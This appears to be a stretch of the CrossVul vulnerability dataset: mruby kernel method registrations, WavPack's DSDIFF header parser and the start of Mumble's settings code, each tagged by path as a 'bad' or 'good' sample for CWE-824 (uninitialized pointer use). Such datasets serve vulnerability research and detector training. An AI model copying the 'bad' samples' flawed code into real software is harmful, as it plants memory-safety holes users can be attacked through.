mrb_define_class_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.5 */
mrb_define_class_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.2.7 */
; /* 15.3.1.2.11 */
mrb_define_class_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_OPT(2)); /* 15.3.1.2.12 */
mrb_define_method(mrb, krn, "singleton_class", mrb_singleton_class, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "===", mrb_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.2 */
mrb_define_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.6 */
mrb_define_method(mrb, krn, "class", mrb_obj_class_m, MRB_ARGS_NONE()); /* 15.3.1.3.7 */
mrb_define_method(mrb, krn, "clone", mrb_obj_clone, MRB_ARGS_NONE()); /* 15.3.1.3.8 */
mrb_define_method(mrb, krn, "dup", mrb_obj_dup, MRB_ARGS_NONE()); /* 15.3.1.3.9 */
mrb_define_method(mrb, krn, "eql?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.10 */
mrb_define_method(mrb, krn, "equal?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.11 */
mrb_define_method(mrb, krn, "extend", mrb_obj_extend_m, MRB_ARGS_ANY()); /* 15.3.1.3.13 */
mrb_define_method(mrb, krn, "freeze", mrb_obj_freeze, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "frozen?", mrb_obj_frozen, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.3.14 */
mrb_define_method(mrb, krn, "hash", mrb_obj_hash, MRB_ARGS_NONE()); /* 15.3.1.3.15 */
mrb_define_method(mrb, krn, "initialize_copy", mrb_obj_init_copy, MRB_ARGS_REQ(1)); /* 15.3.1.3.16 */
mrb_define_method(mrb, krn, "inspect", mrb_obj_inspect, MRB_ARGS_NONE()); /* 15.3.1.3.17 */
mrb_define_method(mrb, krn, "instance_of?", obj_is_instance_of, MRB_ARGS_REQ(1)); /* 15.3.1.3.19 */
mrb_define_method(mrb, krn, "instance_variable_defined?", mrb_obj_ivar_defined, MRB_ARGS_REQ(1)); /* 15.3.1.3.20 */
mrb_define_method(mrb, krn, "instance_variable_get", mrb_obj_ivar_get, MRB_ARGS_REQ(1)); /* 15.3.1.3.21 */
mrb_define_method(mrb, krn, "instance_variable_set", mrb_obj_ivar_set, MRB_ARGS_REQ(2)); /* 15.3.1.3.22 */
mrb_define_method(mrb, krn, "instance_variables", mrb_obj_instance_variables, MRB_ARGS_NONE()); /* 15.3.1.3.23 */
mrb_define_method(mrb, krn, "is_a?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.24 */
mrb_define_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.25 */
mrb_define_method(mrb, krn, "kind_of?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.26 */
mrb_define_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.3.28 */
#ifdef MRB_DEFAULT_METHOD_MISSING
mrb_define_method(mrb, krn, "method_missing", mrb_obj_missing, MRB_ARGS_ANY()); /* 15.3.1.3.30 */
#endif
mrb_define_method(mrb, krn, "methods", mrb_obj_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.31 */
mrb_define_method(mrb, krn, "nil?", mrb_false, MRB_ARGS_NONE()); /* 15.3.1.3.32 */
mrb_define_method(mrb, krn, "object_id", mrb_obj_id_m, MRB_ARGS_NONE()); /* 15.3.1.3.33 */
mrb_define_method(mrb, krn, "private_methods", mrb_obj_private_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.36 */
mrb_define_method(mrb, krn, "protected_methods", mrb_obj_protected_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.37 */
mrb_define_method(mrb, krn, "public_methods", mrb_obj_public_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.38 */
mrb_define_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_ANY()); /* 15.3.1.3.40 */
mrb_define_method(mrb, krn, "remove_instance_variable", mrb_obj_remove_instance_variable,MRB_ARGS_REQ(1)); /* 15.3.1.3.41 */
mrb_define_method(mrb, krn, "respond_to?", obj_respond_to, MRB_ARGS_ANY()); /* 15.3.1.3.43 */
mrb_define_method(mrb, krn, "send", mrb_f_send, MRB_ARGS_ANY()); /* 15.3.1.3.44 */
mrb_define_method(mrb, krn, "singleton_methods", mrb_obj_singleton_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.45 */
mrb_define_method(mrb, krn, "define_singleton_method", mod_define_singleton_method, MRB_ARGS_ANY());
mrb_define_method(mrb, krn, "to_s", mrb_any_to_s, MRB_ARGS_NONE()); /* 15.3.1.3.46 */
mrb_define_method(mrb, krn, "__case_eqq", mrb_obj_ceqq, MRB_ARGS_REQ(1)); /* internal */
mrb_define_method(mrb, krn, "class_defined?", mrb_krn_class_defined, MRB_ARGS_REQ(1));
mrb_include_module(mrb, mrb->object_class, mrb->kernel_module);
mrb_alias_method(mrb, mrb->module_class, mrb_intern_lit(mrb, "dup"), mrb_intern_lit(mrb, "clone"));
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_168_0 |
crossvul-cpp_data_good_824_0 | ////////////////////////////////////////////////////////////////////////////
// **** WAVPACK **** //
// Hybrid Lossless Wavefile Compressor //
// Copyright (c) 1998 - 2019 David Bryant. //
// All Rights Reserved. //
// Distributed under the BSD Software License (see license.txt) //
////////////////////////////////////////////////////////////////////////////
// dsdiff.c
// This module is a helper to the WavPack command-line programs to support DFF files.
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <math.h>
#include <stdio.h>
#include <ctype.h>
#include "wavpack.h"
#include "utils.h"
#include "md5.h"
#ifdef _WIN32
#define strdup(x) _strdup(x)
#endif
#define WAVPACK_NO_ERROR 0
#define WAVPACK_SOFT_ERROR 1
#define WAVPACK_HARD_ERROR 2
extern int debug_logging_mode;
#pragma pack(push,2)
typedef struct {
char ckID [4];
int64_t ckDataSize;
} DFFChunkHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char formType [4];
} DFFFileHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t version;
} DFFVersionChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t sampleRate;
} DFFSampleRateChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint16_t numChannels;
} DFFChannelsHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char compressionType [4];
} DFFCompressionHeader;
#pragma pack(pop)
#define DFFChunkHeaderFormat "4D"
#define DFFFileHeaderFormat "4D4"
#define DFFVersionChunkFormat "4DL"
#define DFFSampleRateChunkFormat "4DL"
#define DFFChannelsHeaderFormat "4DS"
#define DFFCompressionHeaderFormat "4D4"
int ParseDsdiffHeaderConfig (FILE *infile, char *infilename, char *fourcc, WavpackContext *wpc, WavpackConfig *config)
{
int64_t infilesize, total_samples;
DFFFileHeader dff_file_header;
DFFChunkHeader dff_chunk_header;
uint32_t bcount;
infilesize = DoGetFileSize (infile);
memcpy (&dff_file_header, fourcc, 4);
if ((!DoReadFile (infile, ((char *) &dff_file_header) + 4, sizeof (DFFFileHeader) - 4, &bcount) ||
bcount != sizeof (DFFFileHeader) - 4) || strncmp (dff_file_header.formType, "DSD ", 4)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_file_header, sizeof (DFFFileHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
#if 1 // this might be a little too picky...
WavpackBigEndianToNative (&dff_file_header, DFFFileHeaderFormat);
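// a ckDataSize of 0 or -1 is treated as "length unknown"; otherwise it should equal the file size minus the 12-byte FRM8 header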
if (infilesize && !(config->qmode & QMODE_IGNORE_LENGTH) &&
dff_file_header.ckDataSize && dff_file_header.ckDataSize + 1 && dff_file_header.ckDataSize + 12 != infilesize) {
error_line ("%s is not a valid .DFF file (by total size)!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("file header indicated length = %lld", dff_file_header.ckDataSize);
#endif
// loop through all elements of the DSDIFF header
// (until the data chunk) and copy them to the output file
while (1) {
if (!DoReadFile (infile, &dff_chunk_header, sizeof (DFFChunkHeader), &bcount) ||
bcount != sizeof (DFFChunkHeader)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_chunk_header, sizeof (DFFChunkHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
if (debug_logging_mode)
error_line ("chunk header indicated length = %lld", dff_chunk_header.ckDataSize);
if (!strncmp (dff_chunk_header.ckID, "FVER", 4)) {
uint32_t version;
if (dff_chunk_header.ckDataSize != sizeof (version) ||
!DoReadFile (infile, &version, sizeof (version), &bcount) ||
bcount != sizeof (version)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &version, sizeof (version))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&version, "L");
if (debug_logging_mode)
error_line ("dsdiff file version = 0x%08x", version);
}
else if (!strncmp (dff_chunk_header.ckID, "PROP", 4)) {
char *prop_chunk;
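// PROP chunks are expected to be small; sizes outside 4..1024 bytes are rejected before the allocation and read below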
if (dff_chunk_header.ckDataSize < 4 || dff_chunk_header.ckDataSize > 1024) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("got PROP chunk of %d bytes total", (int) dff_chunk_header.ckDataSize);
prop_chunk = malloc ((size_t) dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize, &bcount) ||
bcount != dff_chunk_header.ckDataSize) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize)) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
if (!strncmp (prop_chunk, "SND ", 4)) {
char *cptr = prop_chunk + 4, *eptr = prop_chunk + dff_chunk_header.ckDataSize;
uint16_t numChannels = 0, chansSpecified, chanMask = 0;
uint32_t sampleRate = 0;
while (eptr - cptr >= sizeof (dff_chunk_header)) {
memcpy (&dff_chunk_header, cptr, sizeof (dff_chunk_header));
cptr += sizeof (dff_chunk_header);
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
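// only use this sub-chunk if its declared payload fits inside the remaining PROP data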
if (dff_chunk_header.ckDataSize > 0 && dff_chunk_header.ckDataSize <= eptr - cptr) {
if (!strncmp (dff_chunk_header.ckID, "FS ", 4) && dff_chunk_header.ckDataSize == 4) {
memcpy (&sampleRate, cptr, sizeof (sampleRate));
WavpackBigEndianToNative (&sampleRate, "L");
cptr += dff_chunk_header.ckDataSize;
if (debug_logging_mode)
error_line ("got sample rate of %u Hz", sampleRate);
}
else if (!strncmp (dff_chunk_header.ckID, "CHNL", 4) && dff_chunk_header.ckDataSize >= 2) {
memcpy (&numChannels, cptr, sizeof (numChannels));
WavpackBigEndianToNative (&numChannels, "S");
cptr += sizeof (numChannels);
chansSpecified = (int)(dff_chunk_header.ckDataSize - sizeof (numChannels)) / 4;
if (numChannels < chansSpecified || numChannels < 1 || numChannels > 256) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
while (chansSpecified--) {
if (!strncmp (cptr, "SLFT", 4) || !strncmp (cptr, "MLFT", 4))
chanMask |= 0x1;
else if (!strncmp (cptr, "SRGT", 4) || !strncmp (cptr, "MRGT", 4))
chanMask |= 0x2;
else if (!strncmp (cptr, "LS ", 4))
chanMask |= 0x10;
else if (!strncmp (cptr, "RS ", 4))
chanMask |= 0x20;
else if (!strncmp (cptr, "C ", 4))
chanMask |= 0x4;
else if (!strncmp (cptr, "LFE ", 4))
chanMask |= 0x8;
else
if (debug_logging_mode)
error_line ("undefined channel ID %c%c%c%c", cptr [0], cptr [1], cptr [2], cptr [3]);
cptr += 4;
}
if (debug_logging_mode)
error_line ("%d channels, mask = 0x%08x", numChannels, chanMask);
}
else if (!strncmp (dff_chunk_header.ckID, "CMPR", 4) && dff_chunk_header.ckDataSize >= 4) {
if (strncmp (cptr, "DSD ", 4)) {
error_line ("DSDIFF files must be uncompressed, not \"%c%c%c%c\"!",
cptr [0], cptr [1], cptr [2], cptr [3]);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
cptr += dff_chunk_header.ckDataSize;
}
else {
if (debug_logging_mode)
error_line ("got PROP/SND chunk type \"%c%c%c%c\" of %d bytes", dff_chunk_header.ckID [0],
dff_chunk_header.ckID [1], dff_chunk_header.ckID [2], dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
cptr += dff_chunk_header.ckDataSize;
}
}
else {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
}
if (chanMask && (config->channel_mask || (config->qmode & QMODE_CHANS_UNASSIGNED))) {
error_line ("this DSDIFF file already has channel order information!");
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (chanMask)
config->channel_mask = chanMask;
config->bits_per_sample = 8;
config->bytes_per_sample = 1;
config->num_channels = numChannels;
config->sample_rate = sampleRate / 8;
config->qmode |= QMODE_DSD_MSB_FIRST;
}
else if (debug_logging_mode)
error_line ("got unknown PROP chunk type \"%c%c%c%c\" of %d bytes",
prop_chunk [0], prop_chunk [1], prop_chunk [2], prop_chunk [3], dff_chunk_header.ckDataSize);
free (prop_chunk);
}
else if (!strncmp (dff_chunk_header.ckID, "DSD ", 4)) {
if (!config->num_channels || !config->sample_rate) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
total_samples = dff_chunk_header.ckDataSize / config->num_channels;
break;
}
else { // just copy unknown chunks to output file
int bytes_to_copy = (int)(((dff_chunk_header.ckDataSize) + 1) & ~(int64_t)1);
char *buff;
if (bytes_to_copy < 0 || bytes_to_copy > 4194304) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
buff = malloc (bytes_to_copy);
if (debug_logging_mode)
error_line ("extra unknown chunk \"%c%c%c%c\" of %d bytes",
dff_chunk_header.ckID [0], dff_chunk_header.ckID [1], dff_chunk_header.ckID [2],
dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, buff, bytes_to_copy, &bcount) ||
bcount != bytes_to_copy ||
(!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, buff, bytes_to_copy))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (buff);
return WAVPACK_SOFT_ERROR;
}
free (buff);
}
}
if (debug_logging_mode)
error_line ("setting configuration with %lld samples", total_samples);
if (!WavpackSetConfiguration64 (wpc, config, total_samples, NULL)) {
error_line ("%s: %s", infilename, WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
return WAVPACK_NO_ERROR;
}
int WriteDsdiffHeader (FILE *outfile, WavpackContext *wpc, int64_t total_samples, int qmode)
{
uint32_t chan_mask = WavpackGetChannelMask (wpc);
int num_channels = WavpackGetNumChannels (wpc);
DFFFileHeader file_header, prop_header;
DFFChunkHeader data_header;
DFFVersionChunk ver_chunk;
DFFSampleRateChunk fs_chunk;
DFFChannelsHeader chan_header;
DFFCompressionHeader cmpr_header;
char *cmpr_name = "\016not compressed", *chan_ids;
int64_t file_size, prop_chunk_size, data_size;
int cmpr_name_size, chan_ids_size;
uint32_t bcount;
if (debug_logging_mode)
error_line ("WriteDsdiffHeader (), total samples = %lld, qmode = 0x%02x\n",
(long long) total_samples, qmode);
cmpr_name_size = (strlen (cmpr_name) + 1) & ~1;
chan_ids_size = num_channels * 4;
chan_ids = malloc (chan_ids_size);
if (chan_ids) {
uint32_t scan_mask = 0x1;
char *cptr = chan_ids;
int ci, uci = 0;
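// emit a 4-byte ID per channel by walking the mask bits in order; channels beyond the known mask bits get generic "Cnnn" IDs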
for (ci = 0; ci < num_channels; ++ci) {
while (scan_mask && !(scan_mask & chan_mask))
scan_mask <<= 1;
if (scan_mask & 0x1)
memcpy (cptr, num_channels <= 2 ? "SLFT" : "MLFT", 4);
else if (scan_mask & 0x2)
memcpy (cptr, num_channels <= 2 ? "SRGT" : "MRGT", 4);
else if (scan_mask & 0x4)
memcpy (cptr, "C ", 4);
else if (scan_mask & 0x8)
memcpy (cptr, "LFE ", 4);
else if (scan_mask & 0x10)
memcpy (cptr, "LS ", 4);
else if (scan_mask & 0x20)
memcpy (cptr, "RS ", 4);
else {
cptr [0] = 'C';
cptr [1] = (uci / 100) + '0';
cptr [2] = ((uci % 100) / 10) + '0';
cptr [3] = (uci % 10) + '0';
uci++;
}
scan_mask <<= 1;
cptr += 4;
}
}
else {
error_line ("can't allocate memory!");
return FALSE;
}
data_size = total_samples * num_channels;
prop_chunk_size = sizeof (prop_header) + sizeof (fs_chunk) + sizeof (chan_header) + chan_ids_size + sizeof (cmpr_header) + cmpr_name_size;
file_size = sizeof (file_header) + sizeof (ver_chunk) + prop_chunk_size + sizeof (data_header) + ((data_size + 1) & ~(int64_t)1);
memcpy (file_header.ckID, "FRM8", 4);
file_header.ckDataSize = file_size - 12;
memcpy (file_header.formType, "DSD ", 4);
memcpy (prop_header.ckID, "PROP", 4);
prop_header.ckDataSize = prop_chunk_size - 12;
memcpy (prop_header.formType, "SND ", 4);
memcpy (ver_chunk.ckID, "FVER", 4);
ver_chunk.ckDataSize = sizeof (ver_chunk) - 12;
ver_chunk.version = 0x01050000;
memcpy (fs_chunk.ckID, "FS ", 4);
fs_chunk.ckDataSize = sizeof (fs_chunk) - 12;
fs_chunk.sampleRate = WavpackGetSampleRate (wpc) * 8;
memcpy (chan_header.ckID, "CHNL", 4);
chan_header.ckDataSize = sizeof (chan_header) + chan_ids_size - 12;
chan_header.numChannels = num_channels;
memcpy (cmpr_header.ckID, "CMPR", 4);
cmpr_header.ckDataSize = sizeof (cmpr_header) + cmpr_name_size - 12;
memcpy (cmpr_header.compressionType, "DSD ", 4);
memcpy (data_header.ckID, "DSD ", 4);
data_header.ckDataSize = data_size;
WavpackNativeToBigEndian (&file_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&ver_chunk, DFFVersionChunkFormat);
WavpackNativeToBigEndian (&prop_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&fs_chunk, DFFSampleRateChunkFormat);
WavpackNativeToBigEndian (&chan_header, DFFChannelsHeaderFormat);
WavpackNativeToBigEndian (&cmpr_header, DFFCompressionHeaderFormat);
WavpackNativeToBigEndian (&data_header, DFFChunkHeaderFormat);
if (!DoWriteFile (outfile, &file_header, sizeof (file_header), &bcount) || bcount != sizeof (file_header) ||
!DoWriteFile (outfile, &ver_chunk, sizeof (ver_chunk), &bcount) || bcount != sizeof (ver_chunk) ||
!DoWriteFile (outfile, &prop_header, sizeof (prop_header), &bcount) || bcount != sizeof (prop_header) ||
!DoWriteFile (outfile, &fs_chunk, sizeof (fs_chunk), &bcount) || bcount != sizeof (fs_chunk) ||
!DoWriteFile (outfile, &chan_header, sizeof (chan_header), &bcount) || bcount != sizeof (chan_header) ||
!DoWriteFile (outfile, chan_ids, chan_ids_size, &bcount) || bcount != chan_ids_size ||
!DoWriteFile (outfile, &cmpr_header, sizeof (cmpr_header), &bcount) || bcount != sizeof (cmpr_header) ||
!DoWriteFile (outfile, cmpr_name, cmpr_name_size, &bcount) || bcount != cmpr_name_size ||
!DoWriteFile (outfile, &data_header, sizeof (data_header), &bcount) || bcount != sizeof (data_header)) {
error_line ("can't write .DFF data, disk probably full!");
free (chan_ids);
return FALSE;
}
free (chan_ids);
return TRUE;
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_824_0 |
crossvul-cpp_data_bad_3579_1 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
Copyright (C) 2009-2011, Stefan Hacker <dd0t@users.sourceforge.net>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Settings.h"
#include "Log.h"
#include "Global.h"
#include "AudioInput.h"
#include "Cert.h"
#include "../../overlay/overlay.h"
#include "../../overlay/overlay_blacklist.h"
bool Shortcut::isServerSpecific() const {
if (qvData.canConvert<ShortcutTarget>()) {
const ShortcutTarget &sc = qvariant_cast<ShortcutTarget> (qvData);
return sc.isServerSpecific();
}
return false;
}
bool Shortcut::operator < (const Shortcut &other) const {
return (iIndex < other.iIndex);
}
bool Shortcut::operator == (const Shortcut &other) const {
return (iIndex == other.iIndex) && (qlButtons == other.qlButtons) && (qvData == other.qvData) && (bSuppress == other.bSuppress);
}
ShortcutTarget::ShortcutTarget() {
bUsers = true;
iChannel = -3;
bLinks = bChildren = bForceCenter = false;
}
bool ShortcutTarget::isServerSpecific() const {
return (! bUsers && (iChannel >= 0));
}
bool ShortcutTarget::operator == (const ShortcutTarget &o) const {
if ((bUsers != o.bUsers) || (bForceCenter != o.bForceCenter))
return false;
if (bUsers)
return (qlUsers == o.qlUsers) && (qlSessions == o.qlSessions);
else
return (iChannel == o.iChannel) && (bLinks == o.bLinks) && (bChildren == o.bChildren) && (qsGroup == o.qsGroup);
}
quint32 qHash(const ShortcutTarget &t) {
quint32 h = t.bForceCenter ? 0x55555555 : 0xaaaaaaaa;
if (t.bUsers) {
foreach(unsigned int u, t.qlSessions)
h ^= u;
} else {
h ^= t.iChannel;
if (t.bLinks)
h ^= 0x80000000;
if (t.bChildren)
h ^= 0x40000000;
h ^= qHash(t.qsGroup);
h = ~h;
}
return h;
}
quint32 qHash(const QList<ShortcutTarget> &l) {
quint32 h = l.count();
foreach(const ShortcutTarget &st, l)
h ^= qHash(st);
return h;
}
QDataStream &operator<< (QDataStream &qds, const ShortcutTarget &st) {
qds << st.bUsers << st.bForceCenter;
if (st.bUsers)
return qds << st.qlUsers;
else
return qds << st.iChannel << st.qsGroup << st.bLinks << st.bChildren;
}
QDataStream &operator>> (QDataStream &qds, ShortcutTarget &st) {
qds >> st.bUsers >> st.bForceCenter;
if (st.bUsers)
return qds >> st.qlUsers;
else
return qds >> st.iChannel >> st.qsGroup >> st.bLinks >> st.bChildren;
}
const QString Settings::cqsDefaultPushClickOn = QLatin1String(":/on.ogg");
const QString Settings::cqsDefaultPushClickOff = QLatin1String(":/off.ogg");
OverlaySettings::OverlaySettings() {
bEnable = true;
fX = 1.0f;
fY = 0.0f;
fZoom = 0.875f;
#ifdef Q_OS_MAC
qsStyle = QLatin1String("Cleanlooks");
#endif
osShow = LinkedChannels;
bAlwaysSelf = true;
uiActiveTime = 5;
osSort = Alphabetical;
qcUserName[Settings::Passive] = QColor(170, 170, 170);
qcUserName[Settings::Talking] = QColor(255, 255, 255);
qcUserName[Settings::Whispering] = QColor(128, 255, 128);
qcUserName[Settings::Shouting] = QColor(255, 128, 255);
qcChannel = QColor(255, 255, 128);
qcBoxPen = QColor(0, 0, 0, 224);
qcBoxFill = QColor(0, 0, 0);
setPreset();
// FPS display settings
qcFps = Qt::white;
fFps = 0.75f;
qfFps = qfUserName;
qrfFps = QRectF(10, 10, -1, 0.023438f);
bFps = false;
bUseWhitelist = false;
#ifdef Q_OS_WIN
int i = 0;
while (overlayBlacklist[i]) {
qslBlacklist << QLatin1String(overlayBlacklist[i]);
i++;
}
#endif
}
void OverlaySettings::setPreset(const OverlayPresets preset) {
switch (preset) {
case LargeSquareAvatar:
uiColumns = 2;
fUserName = 0.75f;
fChannel = 0.75f;
fMutedDeafened = 0.5f;
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(-0.0625f, 0.101563f - 0.0625f, 0.125f, 0.023438f);
qrfChannel = QRectF(-0.03125f, -0.0625f, 0.09375f, 0.015625f);
qrfMutedDeafened = QRectF(-0.0625f, -0.0625f, 0.0625f, 0.0625f);
qrfAvatar = QRectF(-0.0625f, -0.0625f, 0.125f, 0.125f);
fBoxPenWidth = (1.f / 256.0f);
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = true;
bMutedDeafened = true;
bAvatar = true;
bBox = false;
qaUserName = Qt::AlignCenter;
qaMutedDeafened = Qt::AlignLeft | Qt::AlignTop;
qaAvatar = Qt::AlignCenter;
qaChannel = Qt::AlignCenter;
break;
case AvatarAndName:
default:
uiColumns = 1;
fUserName = 1.0f;
fChannel = (7.0f / 8.0f);
fMutedDeafened = (7.0f / 8.0f);
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(0.015625f, -0.015625f, 0.250f, 0.03125f);
qrfChannel = QRectF(0.03125f, -0.015625f, 0.1875f, 0.015625f);
qrfMutedDeafened = QRectF(0.234375f, -0.015625f, 0.03125f, 0.03125f);
qrfAvatar = QRectF(-0.03125f, -0.015625f, 0.03125f, 0.03125f);
fBoxPenWidth = 0.0f;
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = false;
bMutedDeafened = true;
bAvatar = true;
bBox = true;
qaUserName = Qt::AlignLeft | Qt::AlignVCenter;
qaMutedDeafened = Qt::AlignRight | Qt::AlignVCenter;
qaAvatar = Qt::AlignRight | Qt::AlignVCenter;
qaChannel = Qt::AlignLeft | Qt::AlignTop;
break;
}
}
Settings::Settings() {
qRegisterMetaType<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaTypeStreamOperators<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaType<QVariant> ("QVariant");
atTransmit = VAD;
bTransmitPosition = false;
bMute = bDeaf = false;
bTTS = true;
bTTSMessageReadBack = false;
iTTSVolume = 75;
iTTSThreshold = 250;
iQuality = 40000;
fVolume = 1.0f;
fOtherVolume = 0.5f;
bAttenuateOthersOnTalk = false;
bAttenuateOthers = true;
iMinLoudness = 1000;
iVoiceHold = 50;
iJitterBufferSize = 1;
iFramesPerPacket = 2;
iNoiseSuppress = -30;
iIdleTime = 0;
vsVAD = Amplitude;
fVADmin = 0.80f;
fVADmax = 0.98f;
bTxAudioCue = false;
qsTxAudioCueOn = cqsDefaultPushClickOn;
qsTxAudioCueOff = cqsDefaultPushClickOff;
bUserTop = false;
bWhisperFriends = false;
uiDoublePush = 0;
bExpert = false;
#ifdef NO_UPDATE_CHECK
bUpdateCheck = false;
bPluginOverlayCheck = false;
#else
bUpdateCheck = true;
bPluginOverlayCheck = true;
#endif
qsImagePath = QDesktopServices::storageLocation(QDesktopServices::PicturesLocation);
ceExpand = ChannelsWithUsers;
ceChannelDrag = Ask;
bMinimalView = false;
bHideFrame = false;
aotbAlwaysOnTop = OnTopNever;
bAskOnQuit = true;
